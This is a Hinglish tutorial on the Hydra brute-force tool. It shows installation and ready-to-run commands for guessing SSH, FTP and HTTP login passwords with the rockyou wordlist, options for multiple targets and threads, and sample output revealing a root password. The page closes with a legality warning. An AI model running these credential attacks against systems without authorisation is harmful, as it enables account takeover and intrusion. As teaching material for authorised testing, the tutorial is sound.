Hydra

Password Cracking Tool

🔐 Hydra क्या है?

Hydra एक very powerful password brute-force tool है जो various protocols के passwords crack कर सकता है। इसका काम है username और password combinations try करके correct credentials find करना।

👉 Online password attacks में सबसे popular tool — SSH, FTP, HTTP, SMTP आदि protocols पर use होता है।

🔑 Hydra क्या-क्या कर सकता है

SSH Brute Force

SSH server का password crack करना

FTP Password Cracking

FTP access के passwords recover करना

HTTP Basic Auth

Website login pages पर attack

SMTP Password

Email server credentials crack करना

50+ Protocols

RDP, Telnet, MySQL और भी बहुत

Multi-threading

Parallel attacks से fast results

⚙️ Kali NetHunter / Termux में Hydra install

aptInstallation Commands

System Update

apt update

Install Hydra

apt install hydra

Verify Installation

hydra -h

💻 Basic Commands (Use)

👉 Commands को एक-एक करके use कर सकते हो:

SSH Password Crack

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ssh

FTP Password Crack

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ftp

HTTP Basic Auth Attack

hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-get /login

Specify Threads (Faster)

hydra -l root -P /usr/share/wordlists/rockyou.txt -t 4 192.168.1.1 ssh

Use Username List

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ssh

🌐 Real Example (Practical समझ)

Example🎯 SSH Password Crack Scenario
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ssh

👉 यह command आपके own network में SSH server पर test करता है

📊 Output समझो

मान लो output कुछ ऐसा आता है:

Hydra v9.5 (c) 2023 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1 login try (l:1/p:1), ~16 tries per task
[DATA] attacking ssh://192.168.1.10:22/
[22][ssh] host: 192.168.1.10 login: root password: toor
1 of 1 target successfully completed, 1 valid password found

🧠 इसका मतलब:

Success

Password Found!

root / toor - correct credentials

1 valid

Total 1 valid password

wordlist में try किए गए passwords में से एक match हुआ

👉 Attack time depends on:

  • • Wordlist का size (rockyou.txt = 14M+ passwords)
  • • Network latency और server response time
  • • Thread count (-t flag से adjust कर सकते हो)

🔥 Advanced Options

Multiple Targets (From File)

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -M targets.txt ssh

Exit on First Found Password

hydra -l root -P /usr/share/wordlists/rockyou.txt -f 192.168.1.10 ssh

Show Progress Every 60 Seconds

hydra -l root -P /usr/share/wordlists/rockyou.txt -V 192.168.1.10 ssh

Save Output to File

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.10 ssh -o hydra_output.txt

👉 यह options attack को customize करने में help करते हैं → efficiency बढ़ती है

⚠️ Important Warning

बिना permission किसी भी system पर password attack करना illegal है

Practice के लिए use करो:

  • अपना local network या virtual machines
  • Authorized penetration testing labs
  • CTF competitions और practice platforms

⚡ Rate Limiting Warning: बहुत तेज attack करने से account lockout हो सकता है या IP block हो सकती है। Use with caution!

🧩 Related Tools

John the Ripper

Offline password cracking

Hashcat

GPU-based hash cracking

CeWL

Custom wordlist generator

Crunch

Custom password list generator

💡 Simple समझ

Hydra = "Lock का Master Key Finder"

यह हजारों keys try करके sahi key ढूंढता है — जैसे हम lock में trial and error से key test करते हैं।